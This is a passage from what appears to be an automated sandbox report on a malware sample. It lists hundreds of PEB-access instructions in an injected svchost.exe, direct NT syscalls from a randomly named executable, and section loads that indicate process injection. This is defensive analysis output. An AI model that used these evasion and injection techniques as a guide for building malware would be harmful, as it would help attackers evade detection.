                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]2_2_03A2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]2_2_03AD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]2_2_03A86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]2_2_03B04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]2_2_03A68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]2_2_03A30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]2_2_03A6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]2_2_03A5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]2_2_03A6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]2_2_03ABCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]2_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]2_2_03ABE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]2_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]2_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]2_2_03AC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]2_2_03A649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03AFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]2_2_03AB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]2_2_03AC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]2_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]2_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]2_2_03ABC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]2_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]2_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]2_2_03ABC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]2_2_03AB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]2_2_03A30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]2_2_03ABC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03AFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03A5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A830 mov eax, dword ptr fs:[00000030h]2_2_03A6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]2_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]2_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC810 mov eax, dword ptr fs:[00000030h]2_2_03ABC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]2_2_03ABE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]2_2_03ABE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]2_2_03AC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]2_2_03AC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60854 mov eax, dword ptr fs:[00000030h]2_2_03A60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]2_2_03A34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]2_2_03A34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CF80 mov eax, dword ptr fs:[00000030h]2_2_03A6CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]2_2_03A62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]2_2_03A62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]2_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]2_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]2_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]2_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]2_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]2_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04FE7 mov eax, dword ptr fs:[00000030h]2_2_03B04FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE6FF7 mov eax, dword ptr fs:[00000030h]2_2_03AE6FF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]2_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]2_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]2_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]2_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EF28 mov eax, dword ptr fs:[00000030h]2_2_03A5EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE6F00 mov eax, dword ptr fs:[00000030h]2_2_03AE6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32F12 mov eax, dword ptr fs:[00000030h]2_2_03A32F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CF1F mov eax, dword ptr fs:[00000030h]2_2_03A6CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5AF69 mov eax, dword ptr fs:[00000030h]2_2_03A5AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5AF69 mov eax, dword ptr fs:[00000030h]2_2_03A5AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2F60 mov eax, dword ptr fs:[00000030h]2_2_03AD2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2F60 mov eax, dword ptr fs:[00000030h]2_2_03AD2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04F68 mov eax, dword ptr fs:[00000030h]2_2_03B04F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]2_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]2_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]2_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]2_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4F42 mov eax, dword ptr fs:[00000030h]2_2_03AD4F42
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003B80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003B80A9
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0038A124 SetUnhandledExceptionFilter,0_2_0038A124
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0038A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0038A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtQueryValueKey: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtOpenKeyEx: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe protection: execute and read and writeJump to behavior
